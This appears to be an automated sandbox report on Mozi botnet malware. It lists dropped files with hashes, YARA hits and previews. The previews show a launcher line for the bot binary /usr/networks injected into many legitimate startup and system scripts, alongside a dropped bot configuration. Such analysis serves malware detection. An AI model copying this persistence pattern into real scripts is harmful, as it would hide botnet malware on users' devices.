                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /etc/profile.d/vte-2.91.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /etc/rc.local
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOOR3n:M
                                                                                                                  MD5:CCE237822A14795B1B5946EAE141691B
                                                                                                                  SHA1:420CE3F920BB02962978255ADDCBF975D4014A3A
                                                                                                                  SHA-256:D9C831E4480DBAAB813BF5BE1BCE6C64CFA4F4320038022E2051BD4E8E4D76DF
                                                                                                                  SHA-512:24A86C9C9944068E3FE6000687E6D392F6587556601E09A22399D15B588536883547B326F13BE506BE492C2269F69AA2DCEDE4FBA8847664793847C74AD5EFF6
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&.exit 0.
                                                                                                                  /etc/rcS.d/S95baby.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:POSIX shell script, ASCII text executable
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25
                                                                                                                  Entropy (8bit):3.8936606896881854
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:TKH4v0VJ:hK
                                                                                                                  MD5:1B3235BA10FC04836C941D3D27301956
                                                                                                                  SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                                                                  SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                                                                  SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                                                                  Malicious:true
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: bin.sh, Detection: malicious, Browse
                                                                                                                  • Filename: i, Detection: malicious, Browse
                                                                                                                  • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                  • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                  • Filename: 1skm346Xtz, Detection: malicious, Browse
                                                                                                                  • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                  • Filename: Mozi.1.m, Detection: malicious, Browse
                                                                                                                  • Filename: 6wuvHEBHt8.bin, Detection: malicious, Browse
                                                                                                                  • Filename: 7v1ic5IS8I, Detection: malicious, Browse
                                                                                                                  • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                  • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                                  • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                  • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                  • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                                  • Filename: bad_file, Detection: malicious, Browse
                                                                                                                  • Filename: mxjzQQFgLp, Detection: malicious, Browse
                                                                                                                  • Filename: JrAL1wW1MQ, Detection: malicious, Browse
                                                                                                                  Preview: #!/bin/sh./usr/networks&.
                                                                                                                  /etc/wpa_supplicant/action_wpa.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):714
                                                                                                                  Entropy (8bit):5.329653855555143
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:cVDDdg8QdNux7S3Pd7PSeSST4ydVgpuVFnn3izesU6jc45gfqlX4n:UDxReIx7O9BSu4ydVBnn4742gyJ4
                                                                                                                  MD5:DD099D71A60531087FDDED3EBEE8036A
                                                                                                                  SHA1:C684334C3B133D889F8C5965184E1C9280BAA16A
                                                                                                                  SHA-256:52995C5CED8EE9421D08E745C5E3D9805783E5D641C7A8FDB1C3CA6A4C745E03
                                                                                                                  SHA-512:2788EB77A944861C3361D12DB65502553EE36314C40A864F73B2FF18AF54DA3D02F5AC07DBA4E962596F11DD8B826243BE2FD52F85F1260B511D3241E1C38C63
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 0.fi..# ifplugd(8) - <iface> <action>.#.# If an ifplugd managed interface is brought up, disconnect any.# wpa-roam managed interfaces so that only one "roaming" interface.# remains active on the system...IFPLUGD_IFACE="${1}"..case "${2}" in..up)...COMMAND=disconnect...;;..down)...COMMAND=reconnect...;;..*)...echo "$0: unknown arguments: ${@}" >&2...exit 1...;;.esac..for CTRL in /run/wpa_supplicant/*; do..[ -S "${CTRL}" ] || continue...IFACE="${CTRL#/run/wpa_supplicant/}"...# skip if ifplugd is managing this interface..if [ "${IFPLUGD_IFACE}" = "${IFACE}" ]; then...continue..fi...if wpa_action "${IFACE}" check; then...wpa_cli -i "${IFACE}" "${COMMAND}"..fi.done../usr/networks&.exit 1.
                                                                                                                  /etc/wpa_supplicant/functions.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 1.
                                                                                                                  /etc/wpa_supplicant/ifupdown.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3368
                                                                                                                  Entropy (8bit):5.3288648372922625
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:VcySPOD1MoGPVKSQ5NkmzYykHypw5lX3yp4ZpOqq9GCyiqYJ7l87OqxOCXnNnogq:lZfGPODjea4+9Gc7kOqxOC9ogwaRM
                                                                                                                  MD5:77FEC347F290A3B065F36EE08ABB77C6
                                                                                                                  SHA1:388D7CC5DDF20DD8651ED01B99460B7CECCBA46A
                                                                                                                  SHA-256:40AE2677EF20938DC8A5D3776051D318F4C8059155D5CC146565DF028B45C283
                                                                                                                  SHA-512:B377C9FED8545F0BC409AD6675E856C9B9C6183D1E6F189E1142E8CCEC89183273D357BE4FB720B680C4057EE045A2E19E9D4E82DDB33F3CED77EA38C1E07EAF
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 0.fi..# allow wpa_supplicant interface to be specified via wpa-iface.# useful for starting wpa_supplicant on one interface of a bridge.if [ -n "$IF_WPA_IFACE" ]; then..WPA_IFACE="$IF_WPA_IFACE".else..WPA_IFACE="$IFACE".fi..# source functions.if [ -f /etc/wpa_supplicant/functions.sh ]; then... /etc/wpa_supplicant/functions.sh.else..exit 0.fi..# quit if executables are not installed.if [ ! -x "$WPA_SUP_BIN" ] || [ ! -x "$WPA_CLI_BIN" ]; then..exit 0.fi..do_start () {..if test_wpa_cli; then...# if wpa_action is active for this IFACE, do nothing...ifupdown_locked && exit 0....# if the administrator is calling ifup, say something useful...if [ "$PHASE" = "pre-up" ]; then....wpa_msg stderr "wpa_action is managing ifup/ifdown state of $WPA_IFACE"....wpa_msg stderr "execute \`ifdown --force $WPA_IFACE' to stop wpa_action"...fi...exit 1..elif ! set | grep -q "^IF_WPA"; then...# no wpa- option defined for IFACE, do nothing...exit 0..fi...# ensure stale ifupdown_lock marker
                                                                                                                  /tmp/.config
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):284
                                                                                                                  Entropy (8bit):4.841045283359712
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:tqRaEtMFtbUrQQxXDzraOn3zuTTn/N+d/JERaEtMFtbUrQQxXDzraOn3zuTTn/NL:AF+Ftb4HaU3zu8EF+Ftb4HaU3zuV
                                                                                                                  MD5:1AB810C9212BB8053F4F725DF471AED5
                                                                                                                  SHA1:25818035C48AD5FD30FF74125A38F7522C0B1AFA
                                                                                                                  SHA-256:20AC9D8408C78F424C045419BEC511C90ADED7E9DFCEA1D26D704D18D1BA5C6E
                                                                                                                  SHA-512:38F215233DBB733F014B31B9DBB8D40DD15AD61EDFB9F62D052F6ABD75A61A162F3298EDFAD9DC47B4DB330041E514AF5A666711FE12BEA8A2E0B5C1DCABC055
                                                                                                                  Malicious:false
                                                                                                                  Preview: 2.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]32770.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]
                                                                                                                  /usr/bin/gettext.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1914
                                                                                                                  Entropy (8bit):4.829445473341419
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:3/fh/ylBZscHBD4JxW0aeLWVXh6Q5bxg35ZnG+PAGWKczBzzP:3xKlscH/zeix/U5ZxAGWxP
                                                                                                                  MD5:6A371C00539A7CA37BBE68DF0F044BE9
                                                                                                                  SHA1:20778B3CCF4C2B42E9EDAD6C2A4ADC0F267CF220
                                                                                                                  SHA-256:0832AFE212207C7C7B8A3F27556B774F3C25DFC4C0AB2AF37D8B0F3C6BEDF090
                                                                                                                  SHA-512:2D49FD8EC5C531F96AE2D84AE3341BD3668A3E00F1AD408E2876B36540E693BB1884266EF9C792DE786F13B33553CADD5629BCD0352F9727D9CE48605EFD05DB
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&. func_usage; exit 0 ;;. --version | --versio | --versi | --vers | --ver | --ve | --v ). func_version; exit 0 ;;. esac. fi. func_usage 1>&2. exit 1. ;;. esac.fi..# eval_gettext MSGID.# looks up the translation of MSGID and substitutes shell variables in the.# result..eval_gettext () {. gettext "$1" | (export PATH `envsubst --variables "$1"`; envsubst "$1").}..# eval_ngettext MSGID MSGID-PLURAL COUNT.# looks up the translation of MSGID / MSGID-PLURAL for COUNT and substitutes.# shell variables in the result..eval_ngettext () {. ngettext "$1" "$2" "$3" | (export PATH `envsubst --variables "$1 $2"`; envsubst "$1 $2").}..# Note: This use of envsubst is much safer than using the shell built-in 'eval'.# would be..# 1) The security problem with Chinese translations that happen to use a.# character such as \xe0\x60 is avoided..# 2) The security problem with malevolent translators who put in command lists.# like "
                                                                                                                  /usr/networks
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):307960
                                                                                                                  Entropy (8bit):5.819679405566689
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                                  MD5:EEC5C6C219535FBA3A0492EA8118B397
                                                                                                                  SHA1:292559E94F1C04B7D0C65D4A01BBBC5DC1FF6F21
                                                                                                                  SHA-256:12013662C71DA69DE977C04CD7021F13A70CF7BED4CA6C82ACBC100464D4B0EF
                                                                                                                  SHA-512:3482C8324A18302F0F37B6E23ED85F24FFF9F50BB568D8FD7461BF57F077A7C592F7A88BB2E1C398699958946D87BB93AB744D13A0003F9B879C15E6471F7400
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: /usr/networks, Author: Florian Roth
                                                                                                                  • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Mirai_4, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Metadefender, Detection: 54%, Browse
                                                                                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                  Preview: .ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../.............-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../................................. ... -...-.......-......0.....V..............O-..M..@....M..P....... ...0..............2............ .......0..N........`... ......P0..H.....X..H..$x..........Z~....P.....U......O..../...V....................Z.....4....`.......0... ...0... ..............2..1C......P... .......... ..~~...0....S......@..Ca......$,..!$...<.......$...,..0!......"<.. 4.......4...<...0..3a...9....."!...1...0....c...P...;.............p........+..0 ...p..$L... B.P....p...@... ..).H..........0.....<.......0.....0... ..(....S.. ..........(,..|0C..+...0......( ...S...........Z.....
                                                                                                                  /usr/sbin/alsa-info.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25983
                                                                                                                  Entropy (8bit):5.455683610707543
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:AhYCrncz9NJ20iuYwj9hkinrV8a0cvxo5sLG:Evrncz9NJGrwj9hkinrV8aHgsLG
                                                                                                                  MD5:9DEFBAA753E5A9E5620E466E81715A35
                                                                                                                  SHA1:751D0F882BE1494064C68A074DA5DC1CE599A349
                                                                                                                  SHA-256:A8E3C858BE59F3DC8811EC7979F347FD07D7213089E5E3A1BD5BA7AFBBA1CE9C
                                                                                                                  SHA-512:24851711C125FB277844B0AEE501A25EC2ED797417FFFF6F862793E24F07B94DF227DB54938728FBED1A711C74D84A7E86599BE248BC173387406BAC27F4E64F
                                                                                                                  Malicious:true
                                                                                                                  Preview: ./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ -s "$SHFILE" -a "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been u
                                                                                                                  /usr/share/alsa-base/alsa-info.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25464
                                                                                                                  Entropy (8bit):5.453877096685684
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:xhDCrnchINJ20QuPxj9DksnrVfp0+KvN5sLF:nernchINJsWxj9DksnrVfp0PsLF
                                                                                                                  MD5:D8A586F0E09BD885937F5C46F02D64D0
                                                                                                                  SHA1:2B5E662E8047318FB7A69BC3EEC9BB72A6300EDB
                                                                                                                  SHA-256:62F4B99FB4C5B55F17E4299589190545998B875C431470D2A87D0E43D7DF990B
                                                                                                                  SHA-512:70B65F5F85A5C2C82FCFD58F0A22CA13C7624AA27C8927EE65933D892443B718461BAD7250AC3271C71C0C22850710E503D20E6F2F33C7BE2FE5D5E8C97C0F13
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been updated to v $REM
                                                                                                                  /usr/share/alsa/utils.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4725
                                                                                                                  Entropy (8bit):5.44928341819888
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:yGC9i91fZ1j73kqM51SvbZGspLpZonAeVceVIP/yKIkC6eZju:yGC90f/4SvbYapZoh/GC64ju
                                                                                                                  MD5:B4F115765D68E40BEBB845FA7F437539
                                                                                                                  SHA1:4C37804189C7D91916E7050F4E4783A4C7F2F389
                                                                                                                  SHA-256:9EAA55914953E4BAE6AF1E28841BD329160A16D17DE8061B04519669B2B2BCF9
                                                                                                                  SHA-512:27D938F1CA106CA6431F2B8635D223BAA47D192D983357A649B95B70DB931199E8B084C2EB337321D9D6B4D4F63D6BA64A8CEFA5FE888896BE7FA1C5D2983CC9
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.bugout() { echo "${MYNAME}: Programming error" >&2 ; exit 123 ; }..echo_card_indices().{..if [ -f /proc/asound/cards ] ; then...sed -n -e's/^[[:space:]]*\([0-7]\)[[:space:]].*/\1/p' /proc/asound/cards..fi.}..filter_amixer_output().{..sed \...-e '/Unable to find simple control/d' \...-e '/Unknown playback setup/d' \...-e '/^$/d'.}..# The following functions try to set many controls..# No card has all the controls and so some of the attempts are bound to fail..# Because of this, the functions can't return useful status values...# $1 <control>.# $2 <level>.# $CARDOPT.unmute_and_set_level().{..{ [ "$2" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "$2" unmute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $CARDOPT.mute_and_zero_level().{..{ [ "$1" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "0%" mute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $2 "on" | "off".# $CARDOPT.switch_control().{..{ [ "$2" ] &&
                                                                                                                  /usr/share/brltty/initramfs/brltty.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):46
                                                                                                                  Entropy (8bit):3.925523369006428
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                                                                  MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                                                                  SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                                                                  SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                                                                  SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                                                                  /usr/share/cups/braille/cups-braille.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:UTF-8 Unicode text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3551
                                                                                                                  Entropy (8bit):5.478748088887141
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:OANcIOY/L/1RAnw/UYfot2tAtldWfRzRukEu/YmWhS3mj4VT5V5TNVIt6Wousukz:OANSY/L/1R3/SRWikEu9bVaH/c
                                                                                                                  MD5:6025702AFC2865AA8BA8638B3B590284
                                                                                                                  SHA1:82A57782652A5D981E9A86E55F0F6D5A276ACEE1
                                                                                                                  SHA-256:98D84975905042A77F6E514D7C54478701D6C0CC4BDDFE8B047D2BE3CD475C5C
                                                                                                                  SHA-512:0E3A45F3160B3CA7442C4B2D4A9A2AD0A5390AC7091E0F9C870A073C3E6C408C171DE71014005196FF310A67B8ABC08BD0619B81972C118F5CF8281B9234C427
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 1. ;;. esac. printf "%s" "$VALUE".}..[ -z "$NB" ] && NB=1..#.# Page size.# Units in 100th of mm.#..# TODO: better handle imageable area.PAGESIZE=$(getOption PageSize).case "$PAGESIZE" in. Legal). PAGEWIDTH=21590. PAGEHEIGHT=35560. ;;. Letter). PAGEWIDTH=21590. PAGEHEIGHT=27940. ;;. A3). PAGEWIDTH=29700. PAGEHEIGHT=42000. ;;. A4). PAGEWIDTH=21000. PAGEHEIGHT=29700. ;;. A4TF). PAGEWIDTH=21000. PAGEHEIGHT=30480. ;;. A5). PAGEWIDTH=14850. PAGEHEIGHT=21000. ;;. 110x115). PAGEWIDTH=27940. PAGEHEIGHT=29210. ;;. 110x120). PAGEWIDTH=27940. PAGEHEIGHT=30480. ;;. 110x170). PAGEWIDTH=27940. PAGEHEIGHT=43180. ;;. 115x110). PAGEWIDTH=29210. PAGEHEIGHT=27940. ;;. 120x120). PAGEWIDTH=30480. PAGEHEIGHT=30480. ;;. *). printf "ERROR: Unknown page size '%s'\n" "$PAGESIZE" >&2. exit 1. ;;.esac..#.TODO: hardcoded margin.PRINTABLEWIDTH=$((PAGEWIDTH - 100
                                                                                                                  /usr/share/cups/braille/index.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):590
                                                                                                                  Entropy (8bit):5.080350031939274
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:aNz9qyz2WNjcIBT/s8lHzSDIyvSs/mFex/UeHz6GJGIyzDFLn:69qA7R/s6TSkc/yex/UeT6GJHa
                                                                                                                  MD5:D662E33F24591E0E67D329E55610FA21
                                                                                                                  SHA1:C23AA5BAE84C14C8E48023BC330990B4377826C0
                                                                                                                  SHA-256:1A9C2355734541A8364E25854C96B0A6C86E524FE55224C9205EF9F0F40B5E55
                                                                                                                  SHA-512:5F7DFCBCCABFAF9D56B5166897CDAA66B0146324A2D3F398B99713CFAE58774FE4D678F04EFC19253366E2455246692A4A9572423331A828459192561B66C40B
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. *) printf "ERROR: unsupported '%s' page folding\n" "$FOLDING" >&2 ; exit 1 ;;. esac.. # Configure dots spacing. case "$TEXTDOTDISTANCE" in. 220) INIT+=,TD1 ;;. 250) INIT+=,TD0 ;;. 320) INIT+=,TD2 ;;. *) printf "ERROR: unsupported '%s' text dot distance\n" "$TEXTDOTDISTANCE" >&2 ; exit 1 ;;. esac. case $GRAPHICDOTDISTANCE in. 160) INIT+=,GD2 ;;. 200) INIT+=,GD0 ;;. 250) INIT+=,GD1 ;;. *) printf "ERROR: unsupported '%s'graphic dot distance\n" "$GRAPHICDOTDISTANCE" >&2 ; exit 1 ;;. esac.. echo "$INIT".}../usr/networks&.exit 1.
                                                                                                                  /usr/share/cups/braille/indexv3.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):945
                                                                                                                  Entropy (8bit):4.9071581716168575
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:hO+DYLYWYZBBmbq2rywi+bdKz80g/D+6k9JSW9L:DDYLYWYZ3rwi+BKjg/D+RJSW9L
                                                                                                                  MD5:F0CACB80F022AB8FC64F04310E59BEC2
                                                                                                                  SHA1:059D10F9C33BF8724F38F1E4A444022D9CEDBD82
                                                                                                                  SHA-256:62634D82D3013B5004E7220BC0CEBA6AE0C6DAFDC41C5B4D19B49A5154BFCE09
                                                                                                                  SHA-512:B94116448FBC22E5E205225FD18B8D3D159BD5BA2E68758BF12EE4EA12860F40C0F5DD8B7F064C8B1994280BDD999779035F80F2D55937C54A649F02A8BC7068
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&..exit 1. fi. if [ $LINESPACING -lt 100 ]. then..echo "ERROR: too small $LINESPACING line spacing" >&2..exit 1. fi. INIT+=,LS$(($LINESPACING / 10)). ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Hoping the user properly configured an 8-dot table. 8) ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same way as the embosser.. INIT=.fi../usr/networks&.exit 1.
                                                                                                                  /usr/share/cups/braille/indexv4.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):818
                                                                                                                  Entropy (8bit):4.8178661177968065
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:C9DYLYWYZBBmbq2rywd8P8LVz80g/D+6k9JSW9L:wDYLYWYZ3rwyP8Bjg/D+RJSW9L
                                                                                                                  MD5:07C3F2CE31B1380132DE8B1D5B9C4BA8
                                                                                                                  SHA1:769D00809D188A7D9F8357152C9B82F634C0514B
                                                                                                                  SHA-256:162E03582392361663035FF70A573CB379796CA647404BFFBE1C22D6AE7C25FB
                                                                                                                  SHA-512:CB698C8E13D0635643F5F8102FFA961D050649F82FB915155B5D19E4CFC5985C86586BF41082731ACFDCBA5F799FF7F056A4D6AD0337383FABC4731D352D16CD
                                                                                                                  Malicious:false
                                                                                                                  Preview: ./usr/networks&. exit 1. ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Firmware 11.02.1 and above allow to make sure to be using a 8-dot table. 8) INIT+=,BT6 ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same way as the embosser.. INIT=.fi../usr/networks&.exit 1.
                                                                                                                  /usr/share/debconf/confmodule.sh
                                                                                                                  Process:/tmp/mozi.a.zip
                                                                                                                  File Type:ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):23
                                                                                                                  Entropy (8bit):3.882045108136863
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
